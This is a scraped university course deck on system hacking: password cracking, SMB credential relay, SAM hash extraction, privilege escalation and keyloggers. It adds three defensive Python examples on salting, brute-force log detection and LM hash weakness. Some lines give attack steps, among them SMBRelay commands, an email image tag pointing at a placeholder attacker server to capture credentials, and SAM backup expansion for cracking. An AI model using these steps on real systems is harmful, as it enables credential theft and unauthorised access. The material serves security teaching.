Module8 Systemhacking 091013102853 Phpapp02 | PDF | Password | Security Engineering


The document discusses various techniques for cracking passwords, including offline and online attacks, and tools used for password cracking. Specific topics covered include password sniffing, brute force cracking, dictionary attacks, rainbow tables, password hashes, and tools like RainbowCrack, LCP, and SMBRelay that can be used to perform password cracking. Countermeasures for password cracking like strong passwords, password hashing, and SMB signing are also mentioned.

Uploaded by

teh kotak

MODULE 8

SYSTEM HACKING
Objective
- Password cracking
- Password attacks
- Identifying various password cracking tools
- Formulating countermeasures for password cracking
- Escalating privileges
- Executing applications
- Keyloggers and spyware
- Spyware and keylogger countermeasures
- Hiding files
- Understanding rootkits
- The use of steganography
- Covering tracks
Faculty of IT, Nong Lam University, Ho Chi Minh City (Khoa CNTT, ĐH Nông Lâm TP. HCM), 2008, page 2/83
Module Flow



SYSTEM HACKING

CRACKING PASSWORDS
CEH Hacking Cycle



Password Types



Types of Password Attacks



Passive Online Attack: Wire Sniffing



Passive Online Attack: Man-in-the-Middle and Replay Attacks
- Somehow get access to the communications channel
- Wait for the authentication sequence
- Proxy the authentication traffic
- No need to brute force



Active Online Attack: Password Guessing



Offline Attacks
- Offline attacks are time consuming
- LM hashes are much more vulnerable due to their smaller key space and shorter length
- Web services are available
- Distributed password cracking techniques are available
- Mitigations:
  - Use good passwords
  - Remove LM hashes
- The attacker has the password database
- Password representations must be cryptographically secure
- Considerations:
  - Moore's law
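The mitigation bullets above say password representations must be cryptographically secure, and the later slides titled "Offline Attack: Pre-Computed Hashes" and "Salting" cover why. The following Python example is added here and is not part of the original deck or of any tool it names: it contrasts an unsalted, single-round hash, which a precomputed lookup table recovers directly, with a per-user random salt plus PBKDF2 iteration from the Python standard library. The record format pbkdf2_sha256$iterations$salt$hash and the COMMON_PASSWORDS list are constructed for the example; SHA-256 stands in for whatever unsalted function a weak system might use.

```python
import base64
import hashlib
import hmac
import os

# Constructed sample: a few common passwords an attacker would precompute
# once and reuse against every system that stores unsalted hashes.
COMMON_PASSWORDS = ["password", "letmein", "Summer2008", "qwerty"]


def unsalted_hash(password: str) -> str:
    """Unsalted, single-round hash: identical passwords give identical hashes,
    so one precomputed table serves every user on every system."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def build_lookup_table(candidates):
    """The 'precomputed hashes' idea in its simplest form: hash -> password."""
    return {unsalted_hash(p): p for p in candidates}


def make_record(password: str, iterations: int = 600_000) -> str:
    """Salted, iterated representation (PBKDF2-HMAC-SHA256, stdlib only).
    Record layout is our own for this example:
    pbkdf2_sha256$iterations$salt_b64$dk_b64"""
    salt = os.urandom(16)  # fresh random salt per record
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (
        iterations,
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(dk).decode("ascii"),
    )


def verify_record(record: str, password: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_b64, dk_b64 = record.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported record format")
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(dk_b64)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(iterations))
    return hmac.compare_digest(dk, expected)


def table_recovers(table, stored_value: str):
    """Does a precomputed table directly recover a stored value?
    Returns the password, or None when the table does not apply."""
    return table.get(stored_value)


def demo(iterations: int = 50_000):
    """Two users who chose the same weak password, stored both ways."""
    table = build_lookup_table(COMMON_PASSWORDS)
    unsalted_a = unsalted_hash("Summer2008")
    unsalted_b = unsalted_hash("Summer2008")
    rec_a = make_record("Summer2008", iterations)
    rec_b = make_record("Summer2008", iterations)
    return {
        "unsalted_identical": unsalted_a == unsalted_b,   # table built once fits both
        "unsalted_in_table": table_recovers(table, unsalted_a),
        "salted_identical": rec_a == rec_b,               # different salts, different records
        "salted_in_table": table_recovers(table, rec_a.split("$")[3]),
        "verify_ok": verify_record(rec_a, "Summer2008"),
        "verify_wrong": verify_record(rec_a, "summer2008"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The salt does not need to be secret; its job is to make every stored record unique so that a table precomputed over candidate passwords has to be rebuilt per record, and the iteration count raises the cost of each rebuild. The 600,000 default is an example figure; production deployments should pick the largest count their login latency budget allows.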
Offline Attacks (cont’d)



Offline Attack: Brute-force Attack



Offline Attack: Pre-Computed Hashes



Syllable Attack / Rule-based Attack / Hybrid Attack



Distributed Network Attack



Distributed Network Attack (cont’d)



Distributed Network Attack (cont’d)



Non-Technical Attacks



http://www.defaultpassword.com/



http://www.cirt.net/cgi-bin/passwd.pl



Password Mitigation



Administrator Password Guessing



Manual Password Cracking Algorithm



Automatic Password Cracking Algorithm



Performing Automated Password Guessing



Microsoft Authentication



NTLM and LM Authentication on the Wire



What is LAN Manager Hash



LM “Hash” Generation



LM Hash



Salting



PWdump2 and PWdump3



Tool: Rainbowcrack



Password Sniffing
- Password guessing is a tough task
- Why not just sniff credentials off the wire as users log in to a server and then replay them to gain access?
- If an attacker is able to eavesdrop on NT/2000 logins, this approach can spare a lot of random guesswork



How to Sniff SMB Credentials



Sniffing Hashes Using LophtCrack



Hacking Tool: NBTDeputy
- NBTDeputy registers a NetBIOS computer name on the network and is ready to respond to NetBT name-query requests.
- NBTDeputy helps to resolve an IP address from a NetBIOS computer name. It is similar to Proxy ARP.
- This tool works well with SMBRelay.
- For example, SMBRelay runs on a computer as ANONYMOUS-ONE with the IP address 192.168.1.10, and NBTDeputy is also run with 192.168.1.10 specified. SMBRelay may then connect to any XP or .NET server when the logged-on users access "My Network Places".



Tool: ScoopLM



Hacking Tool: SMBRelay
- SMBRelay is essentially an SMB server that can capture usernames and password hashes from incoming SMB traffic.
- It can also perform man-in-the-middle (MITM) attacks.
- You must disable NetBIOS over TCP/IP and block ports 139 and 445.
- Start the SMBRelay server and listen for SMB packets:
  c:\>smbrelay /e
  c:\>smbrelay /IL 2 /IR 2
- An attacker can access the client machine by simply connecting to it via the relay address using: c:\>net use * \\<capture_ip>\c$
SMB Replay Attacks
- Trick the client computer into requesting a connection
- Request a connection to the client computer and collect the challenge
- Return the challenge from the client computer as own challenge
- Wait for the response from the client computer
- Return the response as own response
- The best way of fighting the SMB replay attack is by enabling SMB signing in the security policy



SMB Replay Attacks



SMBRelay Man-in-the-Middle Scenario



Redirecting SMB Logon to the Attacker
- Eavesdropping on LM responses becomes much easier if the attacker can trick the victim into attempting Windows authentication of the attacker's choice
- The basic trick is to send an email message to the victim with an embedded hyperlink to a fraudulent SMB server
- When the hyperlink is clicked, the user unwittingly sends his credentials over the network: img src=file://attacker_server/null.gif height=1 width=1
Replay Attack Tool: SMBProxy
- A "Passing the Hash" tool that works as a proxy
- You can authenticate to a Windows NT4/2000 server by knowing only the MD4 hash
- You can mount shares and access the registry and anything a particular user can do with his privileges
- It does not work with syskey-enabled systems



Tool: LCP
- The main purpose of the LCP program is auditing and recovering user account passwords in Windows NT/2000/XP/2003
- Features:
  - Account information imports:
    - Import from local computer
    - Import from remote computer
    - Import from SAM file
    - Import from .LC file
    - Import from .LCS file
    - Import from PwDump file
    - Import from Sniff file
  - Password recovery:
    - Dictionary attack
    - Hybrid of dictionary and brute force attacks
    - Brute force attack
LCP: Screenshot



Tool: Crack



Tool: Access PassView
- Access PassView reveals the database password of every password-protected .mdb file that was created with Microsoft Access 95/97/2000/XP
- It can be useful if you have forgotten the Access database password and want to recover it
- There are two ways of getting the password of the .mdb file:
  - Drag & drop
  - Command line
- Limitations:
  - In Access 2000/XP files, this utility cannot recover passwords that contain more than 18 characters
  - This utility shows only the main database password. It cannot recover the user-level passwords
Access PassView: Screenshot



Password Recovery Tool: MS Access Database Password Decoder
- The "MS Access Database Password Decoder" utility was designed to decrypt the master password stored in a Microsoft Access database



Tool: Asterisk Logger
- Asterisk Logger reveals passwords that are stored behind the asterisks
- Features:
  - Displays additional information about the revealed password, such as the date/time on which the password was revealed, the name of the application that contains the revealed password box, and the executable file of the application
  - Allows you to save the passwords to an HTML file



Tool: Asterisk Key
- Asterisk Key shows passwords hidden under asterisks
- Features:
  - Uncovers hidden passwords on password dialog boxes and web pages
  - State-of-the-art password recovery engine: all passwords are recovered instantly
  - Supports multilingual passwords
  - Full install/uninstall support



Tool: CHAOS Generator



Password Cracking Countermeasures
- Enforce 8-12 character alphanumeric passwords
- Set the password change policy to 30 days
- Physically isolate and protect the server
- Use the SYSKEY utility to store hashes on disk
- Monitor the server logs for brute force attacks on user accounts
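The last countermeasure, monitoring server logs for brute-force attacks, is one the deck does not show in practice. The Python example below is added here and is not from the original material: it runs a sliding-window count of failed logons over a constructed, simplified log (Windows event ID 4625 is a failed logon and 4624 a successful one, but the one-line field layout used here is our own, not the Windows event format). Counting is keyed both per target account and per source IP, so a spray of single attempts across many accounts is caught as well as repeated attempts against one account. The threshold and window are example values, and the lines are assumed to arrive in chronological order.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log. One line per event; fields are a subset of what the
# real Windows Security events carry, in a layout invented for this example.
SAMPLE_LOG = [
    "2008-05-12T10:00:01Z EventID=4625 TargetUserName=Administrator IpAddress=10.0.0.5",
    "2008-05-12T10:00:09Z EventID=4625 TargetUserName=administrator IpAddress=10.0.0.5",
    "2008-05-12T10:00:15Z EventID=4624 TargetUserName=bob IpAddress=10.0.0.9",
    "2008-05-12T10:00:22Z EventID=4625 TargetUserName=administrator IpAddress=10.0.0.5",
    "2008-05-12T10:00:30Z EventID=4625 TargetUserName=administrator IpAddress=10.0.0.5",
    "2008-05-12T10:00:41Z EventID=4625 TargetUserName=administrator IpAddress=10.0.0.5",
    "2008-05-12T10:00:55Z EventID=4625 TargetUserName=bob IpAddress=10.0.0.9",
    "# malformed entry that the parser must skip",
    "2008-05-12T10:02:00Z EventID=4625 TargetUserName=carol IpAddress=10.0.0.9",
    "2008-05-12T10:02:10Z EventID=4625 TargetUserName=dave IpAddress=10.0.0.9",
    "2008-05-12T10:02:20Z EventID=4625 TargetUserName=erin IpAddress=10.0.0.9",
    "2008-05-12T10:02:30Z EventID=4625 TargetUserName=frank IpAddress=10.0.0.9",
    "2008-05-12T10:20:00Z EventID=4625 TargetUserName=alice IpAddress=10.0.0.7",
]

LINE_RE = re.compile(
    r"^(?P<ts>\S+) EventID=(?P<eid>\d+) TargetUserName=(?P<user>\S+) IpAddress=(?P<ip>\S+)$"
)

FAILED_LOGON = 4625  # Windows Security event ID for a failed logon


def parse_line(line: str):
    """Return a dict for a well-formed line, or None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%SZ"),
        "eid": int(m.group("eid")),
        "user": m.group("user").lower(),  # Windows account names are case-insensitive
        "ip": m.group("ip"),
    }


def detect_bruteforce(lines, threshold: int = 5, window: timedelta = timedelta(minutes=5)):
    """Sliding-window count of failed logons, keyed per account (one account
    hammered) and per source IP (many accounts, one source). Emits one alert
    per key, at the moment the threshold is first reached within the window."""
    recent = defaultdict(deque)  # key -> timestamps of failures still inside the window
    alerted = set()
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["eid"] != FAILED_LOGON:
            continue
        for key in (("user", ev["user"]), ("ip", ev["ip"])):
            dq = recent[key]
            dq.append(ev["ts"])
            while dq and ev["ts"] - dq[0] > window:
                dq.popleft()  # expire failures older than the window
            if len(dq) >= threshold and key not in alerted:
                alerted.add(key)
                alerts.append((key[0], key[1], ev["ts"]))
    return alerts


if __name__ == "__main__":
    for kind, value, when in detect_bruteforce(SAMPLE_LOG):
        print("%s brute-force suspected: %s=%s at %s" % (kind, kind, value, when.isoformat()))
```

On the sample, the per-account key fires for "administrator" on its fifth failure and the per-IP key fires for 10.0.0.5 at the same moment; 10.0.0.9 fires only through the per-IP key, because each of its targets saw a single failure. A real deployment would read the events from the Security log rather than a list and would tune the threshold against the lockout policy in force.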



Do Not Store LAN Manager Hash in SAM Database
- Instead of storing your user account password in cleartext, Windows generates and stores user account passwords by using two different password "hashes"
- When you set or change the password for a user account to a password that contains fewer than 15 characters, Windows generates both a LAN Manager hash (LM hash) and a Windows NT hash (NT hash) of the password
- These hashes are stored in the local Security Accounts Manager (SAM) database or in Active Directory
- The LM hash is relatively weak compared to the NT hash and so is prone to a fast brute-force attack. Therefore, you may want to prevent Windows from storing an LM hash of your password
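Both this slide and the "Offline Attacks" list earlier say the LM hash is weak because of its smaller key space and shorter effective length. The Python example below is added here and is not part of the original deck: it reproduces only the LM pre-processing (uppercase, truncate or NUL-pad to 14 bytes, split into two independent 7-byte halves), not the DES step that follows, and compares the resulting worst-case search size with that of the NT hash over the same printable-ASCII alphabet. The alphabet sizes (95 printable ASCII characters, 69 of them left after uppercasing) are the assumptions the arithmetic rests on; the NT hash also accepts non-ASCII characters, so its figure is a lower bound.

```python
import math

# Alphabet sizes assumed for the search-space arithmetic: printable ASCII is
# 0x20-0x7E (95 characters); LM uppercases first, which folds the 26 lowercase
# letters into their uppercase forms and leaves 69 distinct values.
PRINTABLE_ASCII = 95
LM_EFFECTIVE_ALPHABET = PRINTABLE_ASCII - 26
LM_HALF_LEN = 7
LM_MAX_LEN = 14


def lm_preprocess(password: str) -> bytes:
    """LM pre-processing only: uppercase, encode, truncate to 14 bytes, NUL-pad.
    The real algorithm then DES-encrypts a constant under each 7-byte half;
    that step is deliberately not reproduced here. ASCII encoding is a
    simplification of the OEM code page LM actually uses."""
    data = password.upper().encode("ascii", errors="replace")[:LM_MAX_LEN]
    return data.ljust(LM_MAX_LEN, b"\x00")


def lm_halves(password: str):
    """The two 7-byte halves, each of which is hashed independently."""
    padded = lm_preprocess(password)
    return padded[:LM_HALF_LEN], padded[LM_HALF_LEN:]


def lm_second_half_is_empty(password: str) -> bool:
    """A password of 7 or fewer characters leaves the second half all NUL, so
    that half's hash is one well-known constant for every such password."""
    return lm_halves(password)[1] == b"\x00" * LM_HALF_LEN


def lm_bruteforce_work(password_len: int = LM_MAX_LEN) -> int:
    """Worst-case candidates to exhaust: the halves are searched separately,
    so the cost is the SUM of two searches of at most 7 characters each.
    Anything beyond 14 characters is discarded by the truncation."""
    effective = min(password_len, LM_MAX_LEN)
    first = min(effective, LM_HALF_LEN)
    second = max(0, effective - LM_HALF_LEN)
    return LM_EFFECTIVE_ALPHABET ** first + LM_EFFECTIVE_ALPHABET ** second


def nt_bruteforce_work(password_len: int) -> int:
    """NT hash keeps case and the full length: one search of alphabet**len."""
    return PRINTABLE_ASCII ** password_len


def weakness_orders_of_magnitude(password_len: int = LM_MAX_LEN) -> float:
    """log10 of (NT search size / LM search size) for the same password length."""
    return math.log10(nt_bruteforce_work(password_len)) - math.log10(lm_bruteforce_work(password_len))


if __name__ == "__main__":
    print("halves of 'Password123!':", lm_halves("Password123!"))
    print("LM worst case, 14 chars: %e candidates" % lm_bruteforce_work(14))
    print("NT worst case, 14 chars: %e candidates" % nt_bruteforce_work(14))
    print("NT is ~10^%.1f times harder to exhaust" % weakness_orders_of_magnitude(14))
```

The two numbers are the whole argument of the slide: a 14-character LM hash costs at most two 69^7 searches (about 1.5e13 candidates in total), whereas the NT hash of the same password is a single 95^14 search (about 4.9e27), more than fourteen orders of magnitude larger. Disabling LM hash storage, as the slide recommends, removes the cheaper of the two representations.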
LM Hash Backward Compatibility
- Windows 2000-based servers and Windows Server 2003-based servers can authenticate users who connect with computers that are running earlier versions of Windows
- Windows 95/98 clients do not use Kerberos for authentication
- For backward compatibility, Windows 2000 and Windows Server 2003 support:
  - LAN Manager (LM) authentication
  - Windows NT (NTLM) authentication
  - NTLM version 2 (NTLMv2) authentication



LM Hash Backward Compatibility
- NTLM, NTLMv2, and Kerberos all use the NT hash, also known as the Unicode hash
- The LM authentication protocol uses the "LM hash"
- It is best to prevent storage of the LM hash if you do not need it for backward compatibility. If your network contains Windows 95, Windows 98, or Macintosh clients, you may experience the following problems if you prevent the storage of LM hashes



How to Disable LM HASH



SYSTEM HACKING

Escalating Privileges
Privilege Escalation



Cracking NT/2000 Passwords
- The SAM file in Windows NT/2000 contains the user names and encrypted passwords. The SAM file is located in the %systemroot%\system32\config directory
- The file is locked while the OS is running
- Booting to an alternate OS:
  - NTFSDOS (www.sysInternals.com) will mount any NTFS partition as a logical drive
- Backup SAM from the Repair directory:
  - Whenever rdisk /s is run, a compressed copy of the SAM called SAM._ is created in %systemroot%\repair. Expand this file using c:\>expand sam._ sam
- Extract the hashes from the SAM
- Use L0phtCrack to crack the password hashes
Active@ Password Changer



Active@ Password Changer: Screenshots 1



Active@ Password Changer: Screenshots 2



Active@ Password Changer: Screenshots 3



Privilege Escalation Tool: x.exe
This tool, when executed on remote systems, creates a user called "X" with a password of "X" and adds the user to the administrators group



SYSTEM HACKING

Executing Applications
Tool: psexec
- Lets you execute processes on other systems remotely
- Launches interactive command prompts on remote systems



Tool: remoexec



Tool: Alchemy Remote Executor



Emsa FlexInfo Pro
- Emsa FlexInfo Pro is a system information and diagnostics tool that gives you access to system details and settings
- It includes a real-time CPU and memory graph, as well as CPU speed test and memory test tools
- It includes several useful networking utilities (Bandwidth Monitor, Ping, Whois etc.) as well as an atomic time synchronizer, a browser popup blocker, and a basic keylogger



Emsa FlexInfo Pro: Screenshot



Keystroke Loggers
- If all other attempts to sniff out domain privileges fail, then a keystroke logger is the solution
- Keystroke loggers are stealth software packages that are placed between the keyboard hardware and the operating system, so that they can record every keystroke
- There are two types of keystroke loggers:
  - Software-based
  - Hardware-based



Revealer Keylogger
- The Revealer Keylogger tool records keyboard input
- Revealer Keylogger's powerful log engine logs any language on any keyboard and correctly handles dead keys
- Features:
  - Powerful log engine
  - Fully invisible mode
  - Password protection
  - Sends log files via e-mail



Revealer Keylogger: Screenshot



Hacking Tool: Hardware Key Logger
- The Hardware Key Logger is a tiny hardware device that can be attached in between a keyboard and a computer.
- It keeps a record of all keystrokes typed on the keyboard. The recording process is totally transparent to the end user.



Hardware Keylogger: Output



What is Spyware?
- Spyware is a program that records computer activities on a machine:
  - Records keystrokes
  - Records email messages
  - Records IM chat sessions
  - Records websites visited
  - Records applications opened
  - Captures screenshots



Spyware: Spector
- Spector is spyware that records everything that one does on the Internet
- Spector automatically takes hundreds of snapshots every hour, like a surveillance camera
- Spector works by taking a snapshot of whatever is on the computer screen and saving it in a hidden location on the system's hard drive



Keylogger Countermeasures
- Install antivirus software and keep the signatures up to date
- Install a host-based IDS such as the Cisco CSA agent, which can monitor your system and block the installation of keyloggers
- Keep your hardware systems secure in a locked environment
- Frequently check the keyboard cables for attached connectors



Anti-Keylogger
- This tool can detect keylogger installations and remove them

